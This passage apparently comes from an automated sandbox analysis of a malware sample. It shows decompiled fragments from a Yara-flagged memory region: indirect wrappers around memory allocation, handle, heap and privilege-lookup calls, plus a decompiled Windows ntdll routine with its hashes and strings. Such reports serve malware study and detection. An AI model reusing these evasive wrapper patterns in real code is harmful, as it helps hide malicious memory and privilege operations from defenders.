                                  				long _t14;
                                  				void* _t21;
                                  				void* _t25;
                                  
                                  				asm("in al, dx");
                                  				_t10 =  *((intOrPtr*)(_t25 + 8));
                                  				_t3 = _t10 + 0xc60; // 0xca0
                                  				E724991E0(_t21,  *((intOrPtr*)(_t25 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0x10)), 0, 0x30);
                                  				_t14 = NtAllocateVirtualMemory( *(_t25 + 0xc),  *(_t25 + 0x10),  *(_t25 + 0x14),  *(_t25 + 0x18),  *(_t25 + 0x1c),  *(_t25 + 0x20)); // executed
                                  				return _t14;
                                  			}






                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,724993B4,?,00000000,?,00003000,00000040,00000000,00000000,72488B13), ref: 724987F9
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
                                  • Instruction ID: de9aab209645c58df40ae533314d8889c53137f4f8f587e6c8922d422a268de1
                                  • Opcode Fuzzy Hash: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
                                  • Instruction Fuzzy Hash: 46F015B2200108AFDB14CF88CC84EEB7BADAF88350F118248FA0897240C630E911CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E72498710(intOrPtr _a4, void* _a8) {
                                  				long _t8;
                                  				void* _t11;
                                  
                                  				_t5 = _a4;
                                  				_t2 = _t5 + 0x10; // 0x300
                                  				_t3 = _t5 + 0xc50; // 0x72489763
                                  				E724991E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                  				_t8 = NtClose(_a8); // executed
                                  				return _t8;
                                  			}





                                  APIs
                                  • NtClose.NTDLL(72493D50,?,?,72493D50,72488B13,FFFFFFFF), ref: 72498735
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: b96f8f29bc04b463bdbaf386d3e16e847137ea189777c4b74b2d977d26ef12e6
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: 1AD012752002146BD710DBD8CC49E977B5CEF44750F154459BA585B241C530F600C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E724888D0(intOrPtr* _a4) {
                                  				intOrPtr _v8;
                                  				char _v24;
                                  				char _v284;
                                  				char _v804;
                                  				char _v840;
                                  				void* _t24;
                                  				void* _t31;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t39;
                                  				void* _t50;
                                  				intOrPtr* _t52;
                                  				void* _t53;
                                  				void* _t54;
                                  				void* _t55;
                                  				void* _t56;
                                  
                                  				_t52 = _a4;
                                  				_t39 = 0; // executed
                                  				_t24 = E72486E20(_t52,  &_v24); // executed
                                  				_t54 = _t53 + 8;
                                  				if(_t24 != 0) {
                                  					E72487030( &_v24,  &_v840);
                                  					_t55 = _t54 + 8;
                                  					do {
                                  						E7249A100( &_v284, 0x104);
                                  						E7249A770( &_v284,  &_v804);
                                  						_t56 = _t55 + 0x10;
                                  						_t50 = 0x4f;
                                  						while(1) {
                                  							_t31 = E72493DF0(E72493D90(_t52, _t50),  &_v284);
                                  							_t56 = _t56 + 0x10;
                                  							if(_t31 != 0) {
                                  								break;
                                  							}
                                  							_t50 = _t50 + 1;
                                  							if(_t50 <= 0x62) {
                                  								continue;
                                  							} else {
                                  							}
                                  							goto L8;
                                  						}
                                  						_t9 = _t52 + 0x14; // 0xffffe1a5
                                  						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                  						_t39 = 1;
                                  						L8:
                                  						_t33 = E72487060( &_v24,  &_v840);
                                  						_t55 = _t56 + 8;
                                  					} while (_t33 != 0 && _t39 == 0);
                                  					_t34 = E724870E0(_t52,  &_v24); // executed
                                  					if(_t39 == 0) {
                                  						asm("rdtsc");
                                  						asm("rdtsc");
                                  						_v8 = _t34 - 0 + _t34;
                                  						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                  					}
                                  					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                  					_t20 = _t52 + 0x31; // 0x5608758b
                                  					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                  					return 1;
                                  				} else {
                                  					return _t24;
                                  				}
                                  			}




















                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 288e62ee0fdbe8756f45e8a145c5f78f9cc3ec81abe2d106fbbf9ecc9082e93c
                                  • Instruction ID: 1934fd96053c3b76128060e1d2b4f0c9c2f35640d7a3cbad08dc9560945a6d3a
                                  • Opcode Fuzzy Hash: 288e62ee0fdbe8756f45e8a145c5f78f9cc3ec81abe2d106fbbf9ecc9082e93c
                                  • Instruction Fuzzy Hash: 102127B3C5021C5BCB15C66CED51BEF7BBDAF41304F0405ADE98A93240F635AB498BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E724988B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                  				void* _t10;
                                  				void* _t15;
                                  
                                  				E724991E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                  				_t6 =  &_a8; // 0x72493536
                                  				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • RtlAllocateHeap.NTDLL(65Ir,?,72493CAF,72493CAF,?,72493536,?,?,?,?,?,00000000,72488B13,?), ref: 724988DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65Ir
                                  • API String ID: 1279760036-1226095430
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 8bda809eb0cbeda16b847adcc270f17c54dd631a9ce1f5803aded0c41d729ae0
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: 84E012B1200208ABDB14DF99CC45EA77BACAF88650F118558FA085B241CA30FA10CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E72498922(void* __eax, void* __ecx, void* __edi, void* __esi, void* _a4, long _a8, void* _a12, void* _a877535884) {
                                  				intOrPtr _v0;
                                  				char _t19;
                                  
                                  				_push(__edi);
                                  				if(__ecx + 1 != 0) {
                                  					asm("invalid");
                                  					_t16 = _v0;
                                  					_push(__eax);
                                  					_t5 = _t16 + 0xc74; // 0xc74
                                  					E724991E0(__edi, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                  					_t19 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                  					return _t19;
                                  				} else {
                                  					asm("iretd");
                                  					__ebp = __esp;
                                  					__eax = _v0;
                                  					__ecx =  *((intOrPtr*)(__eax + 0xa14));
                                  					__esi = __eax + 0xc7c;
                                  					__eax =  *__esi;
                                  					__eax =  *((intOrPtr*)( *__esi))(_a4, __ebp);
                                  					_pop(__esi);
                                  					__ebp = __esi;
                                  					return  *__esi;
                                  				}
                                  			}






                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
                                  • Instruction ID: 2ec9996dabc056e2169adec53288e304743c77f013ddee4bba478f6ee7995407
                                  • Opcode Fuzzy Hash: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
                                  • Instruction Fuzzy Hash: E2F085B1204209ABCB19DF98CC49EAB3B69BF88750F008058FD489B252D630E902CAA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E724988E2(void* __eax, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                  				char _t12;
                                  				void* _t18;
                                  
                                  				asm("std");
                                  				asm("invalid");
                                  				_t9 = _a4;
                                  				_t3 = _t9 + 0xc74; // 0xc74
                                  				E724991E0(_t18, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                  				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                  				return _t12;
                                  			}






                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
                                  • Instruction ID: 279ae8aedf847731490b25925f02c6821dc0c4993d491638859e24523a4ee969
                                  • Opcode Fuzzy Hash: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
                                  • Instruction Fuzzy Hash: 78E06DBA244604BFD718DF98CC49EA7776DFF88350F014549F9689B355C630E914CAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E72497ED0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				void* _t12;
                                  				void* _t17;
                                  				intOrPtr* _t18;
                                  
                                  				_t8 = _a4;
                                  				_t18 = _a4 + 0xbbc;
                                  				E724991E0(_t17, _t8, _t18,  *((intOrPtr*)(_t8 + 0x10)), 0, 7);
                                  				_t12 =  *((intOrPtr*)( *_t18))(_a8, _a12, _a16, _a20); // executed
                                  				return _t12;
                                  			}







                                  APIs
                                  • RtlDosPathNameToNtPathName_U.NTDLL(72488B13,00000000,00000000,72488B13,00000000,00000000,72488B13,?,00000000), ref: 72497F01
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$NameName_
                                  • String ID:
                                  • API String ID: 3514427675-0
                                  • Opcode ID: 0b98ad15841828ca5ddcf84ce11afcab491f7d4471edfa9e44c91c02bf0c7a33
                                  • Instruction ID: c9222683a8c3a145c9516d98d53028e0c85f09768c279f64324e017e8a48800f
                                  • Opcode Fuzzy Hash: 0b98ad15841828ca5ddcf84ce11afcab491f7d4471edfa9e44c91c02bf0c7a33
                                  • Instruction Fuzzy Hash: EAE01AB5600208AFDB14DF88CC85EA77BACEF88650F008458BA5897241C670F910CBF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E72498A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                  				int _t10;
                                  				void* _t15;
                                  
                                  				E724991E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,7248CFC2,7248CFC2,00000041,00000000,?,72488B85), ref: 72498A80
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: 42c8a8eda208aa3b7ea5a877baaf61df91258a5d744053e6be571dff2580eb6f
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 4DE01AB12002086BDB10DF89CC85EE737ADAF88650F018154FA0857241C930E910CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E724988F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                  				char _t10;
                                  				void* _t15;
                                  
                                  				_t3 = _a4 + 0xc74; // 0xc74
                                  				E724991E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: e4b5d75f35db6b71e24a6522f4d6610811bcdd7db99fa8933b0417ac63d5f9bc
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: F0E046B1200208ABDB18DF99CC49EA77BACEF88750F018558FE085B251CA30FA10CAF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 55%
                                  			E025BC5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				signed int _v8;
                                  				char _v544;
                                  				char _v1064;
                                  				char _v1068;
                                  				char _v1069;
                                  				signed short* _v1076;
                                  				signed short _v1080;
                                  				intOrPtr _v1084;
                                  				signed short _v1086;
                                  				char _v1088;
                                  				char _v1092;
                                  				signed short _v1096;
                                  				char _v1100;
                                  				char* _v1104;
                                  				short _v1106;
                                  				char _v1108;
                                  				char _v1111;
                                  				char _v1112;
                                  				signed short _v1116;
                                  				char _v1120;
                                  				intOrPtr _v1124;
                                  				short _v1126;
                                  				char _v1128;
                                  				intOrPtr _v1132;
                                  				intOrPtr _v1136;
                                  				intOrPtr _v1140;
                                  				char _v1144;
                                  				intOrPtr _v1148;
                                  				short _v1150;
                                  				char _v1152;
                                  				char* _v1156;
                                  				short _v1158;
                                  				char _v1160;
                                  				intOrPtr _v1164;
                                  				intOrPtr _v1172;
                                  				intOrPtr _v1176;
                                  				char _v1180;
                                  				intOrPtr _v1184;
                                  				intOrPtr _v1188;
                                  				intOrPtr _v1192;
                                  				char* _v1196;
                                  				intOrPtr _v1200;
                                  				char _v1204;
                                  				char _v1212;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t173;
                                  				intOrPtr _t175;
                                  				void* _t191;
                                  				void* _t193;
                                  				intOrPtr _t200;
                                  				char _t215;
                                  				void* _t226;
                                  				signed short _t250;
                                  				void* _t284;
                                  				signed short _t286;
                                  				unsigned int _t292;
                                  				short _t294;
                                  				signed int _t295;
                                  				void* _t296;
                                  
                                  				_t173 =  *0x2672088; // 0x77fdf0e4
                                  				_v8 = _t173 ^ _t295;
                                  				_t175 = _a4;
                                  				_t272 = _a8;
                                  				_v1132 = _a16;
                                  				_v1140 = _a20;
                                  				_v1160 = 0;
                                  				_v1158 = 0x208;
                                  				_v1156 =  &_v1064;
                                  				_t282 = 0;
                                  				_t288 = 0;
                                  				_t286 = _a12;
                                  				_v1164 = _t175;
                                  				_v1069 = 0;
                                  				_v1068 = 0;
                                  				_v1136 = 0;
                                  				_v1088 = 0;
                                  				_v1086 = 0;
                                  				_v1084 = 0;
                                  				_v1128 = 0;
                                  				_v1126 = 0;
                                  				_v1124 = 0;
                                  				_v1144 = 0;
                                  				if(_t175 == 0) {
                                  					_t282 = 0;
                                  					L66:
                                  					_push(_t282);
                                  					_push(_t286);
                                  					_push(_t272);
                                  					_push(_t175);
                                  					E025E3F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
                                  					_t288 = 0xc000000d;
                                  					L18:
                                  					if(_v1069 == 0) {
                                  						L20:
                                  						if(_v1084 != 0) {
                                  							 *0x259e6f0(_v1084);
                                  						}
                                  						if(_v1068 != 0) {
                                  							E0258F9F0(_v1068);
                                  						}
                                  						if(_v1136 != 0) {
                                  							E0259E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
                                  						}
                                  						L23:
                                  						return E0259E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
                                  					}
                                  					L19:
                                  					_v1120 = _v1144;
                                  					_v1132(4,  &_v1120, _v1140);
                                  					goto L20;
                                  				}
                                  				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
                                  					_t282 =  *((intOrPtr*)(_t175 + 4));
                                  					goto L66;
                                  				} else {
                                  					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
                                  						goto L23;
                                  					}
                                  					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
                                  					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
                                  					_t291 =  *((intOrPtr*)(_t191 + 0x50));
                                  					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
                                  					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
                                  						_push(_t272);
                                  						E025E3F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
                                  						L39:
                                  						_t288 = 0xc0000106;
                                  						goto L20;
                                  					}
                                  					if(( *(_t191 + 4) & 0x00000010) != 0) {
                                  						L27:
                                  						_v1076 =  &_v1160;
                                  						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
                                  						_v1080 = _t286;
                                  						if(_t286 == 0) {
                                  							_t288 = 0xc00000e5;
                                  							goto L23;
                                  						}
                                  						_t193 = E025A8342(_t286, 0x5c);
                                  						_pop(_t272);
                                  						if(_t193 == 0) {
                                  							_t288 = 0xc00000e5;
                                  							goto L20;
                                  						}
                                  						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
                                  						if(_t286 > 0x208) {
                                  							if(_t286 > 0xfffe) {
                                  								goto L39;
                                  							}
                                  							_v1086 = _t286;
                                  							_t200 =  *0x259e6f4(_t286 & 0x0000ffff);
                                  							_v1084 = _t200;
                                  							if(_t200 != 0) {
                                  								_v1076 =  &_v1088;
                                  								goto L30;
                                  							}
                                  							_t288 = 0xc0000017;
                                  							goto L20;
                                  						}
                                  						L30:
                                  						_t292 = _t286 & 0x0000ffff;
                                  						E02592340(_v1076[2], _v1080, _t292 - 2);
                                  						_t272 = 0;
                                  						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
                                  						_t296 = _t296 + 0xc;
                                  						 *_v1076 = _t286;
                                  						L15:
                                  						if(_v1068 == 0) {
                                  							if(E025ADA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
                                  								E025E3F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
                                  								_t288 = 0xc000003a;
                                  								goto L18;
                                  							}
                                  							_v1136 = _v1124;
                                  							_t215 = _v1180;
                                  							if(_t215 != 0) {
                                  								_v1128 = _t215;
                                  								_v1124 = _v1176;
                                  							} else {
                                  								_v1172 = 0;
                                  							}
                                  							_v1200 = _v1172;
                                  							_push(0x21);
                                  							_v1196 =  &_v1128;
                                  							_push(3);
                                  							_push( &_v1212);
                                  							_push( &_v1204);
                                  							_push(0x100020);
                                  							_v1204 = 0x18;
                                  							_v1192 = 0x40;
                                  							_v1188 = 0;
                                  							_v1184 = 0;
                                  							_t288 = L0258FD74( &_v1068);
                                  							E025AA331( &_v1180, _t272,  &_v1180);
                                  							if(_t288 >= 0) {
                                  								goto L16;
                                  							} else {
                                  								_push(_t288);
                                  								E025E3F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
                                  								goto L18;
                                  							}
                                  						}
                                  						L16:
                                  						_t226 = E025BCC91(_v1164, _a12, _v1076,  &_v1068);
                                  						_t288 = _t226;
                                  						if(_t226 < 0) {
                                  							E025E3F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
                                  						} else {
                                  							_t288 = 0;
                                  						}
                                  						goto L18;
                                  					}
                                  					_v1076 = 0;
                                  					_t294 =  *((intOrPtr*)(_t191 + 0x50));
                                  					_v1152 = _t294;
                                  					_v1150 = _t294;
                                  					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
                                  					_v1108 = 0;
                                  					_v1106 = 0x216;
                                  					_v1104 =  &_v544;
                                  					_v1120 = _t272;
                                  					_v1116 = _t286;
                                  					_v1112 = 0;
                                  					_v1100 = 0;
                                  					_v1092 = 0;
                                  					_v1096 = 0;
                                  					_v1132(1,  &_v1120, _v1140);
                                  					if(_v1092 != 0) {
                                  						_t288 = 0xc0000120;
                                  						goto L20;
                                  					}
                                  					if(_v1100 != 0) {
                                  						_t288 = E025BD088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                  						if(_t288 >= 0) {
                                  							_t288 = E025BCC91(_v1164, _t286,  &_v1108,  &_v1068);
                                  							if(_t288 >= 0) {
                                  								_t288 = 0;
                                  								goto L20;
                                  							}
                                  							_push(_t288);
                                  							_push(_t286);
                                  							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
                                  							L50:
                                  							_push(0);
                                  							_push(0x33);
                                  							E025E3F92();
                                  							goto L20;
                                  						}
                                  						_push(_t288);
                                  						_push( &_v1108);
                                  						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
                                  						goto L50;
                                  					}
                                  					_v1144 = _v1112;
                                  					_t250 = _v1096;
                                  					_t286 = 0;
                                  					_v1080 = _t250;
                                  					_v1069 = 1;
                                  					if(_t250 <= 0) {
                                  						L14:
                                  						if(_t286 == _v1080) {
                                  							L59:
                                  							_push(_t286);
                                  							E025E3F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
                                  							_t288 = 0xc0150004;
                                  							goto L19;
                                  						}
                                  						goto L15;
                                  					} else {
                                  						goto L10;
                                  					}
                                  					while(1) {
                                  						L10:
                                  						_v1120 = _v1144;
                                  						_v1108 = 0;
                                  						_v1106 = 0x216;
                                  						_v1104 =  &_v544;
                                  						_v1116 = _t286;
                                  						_v1112 = 0;
                                  						_v1111 = 0;
                                  						_v1132(2,  &_v1120, _v1140);
                                  						if(_v1112 != 0) {
                                  							break;
                                  						}
                                  						if(_v1111 != 0) {
                                  							if(_v1108 == 0) {
                                  								goto L59;
                                  							}
                                  							_t159 = _t286 + 1; // 0x1
                                  							_v1080 = _t159;
                                  						}
                                  						if(_v1108 != 0) {
                                  							if(_v1068 != 0) {
                                  								E0258F9F0(_v1068);
                                  								_v1068 = 0;
                                  							}
                                  							_t288 = E025BD088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                  							if(_t288 >= 0) {
                                  								goto L14;
                                  							} else {
                                  								if(_t288 == 0xc0150004) {
                                  									goto L13;
                                  								} else {
                                  									_push(_t288);
                                  									_push( &_v1152);
                                  									E025E3F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
                                  									goto L19;
                                  								}
                                  								goto L27;
                                  							}
                                  						}
                                  						L13:
                                  						_t286 = _t286 + 1;
                                  						if(_t286 < _v1080) {
                                  							continue;
                                  						}
                                  						goto L14;
                                  					}
                                  					_t288 = 0xc0000120;
                                  					goto L19;
                                  				}
                                  			}

                                  Strings
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 025F5496
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 025F53FD
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 025F5586
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 025F551A
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 025F5566
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 025F54E7
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 025F545F
                                  • @, xrefs: 025D22A5
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 025F5550
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 025F5386
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 025F5581
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
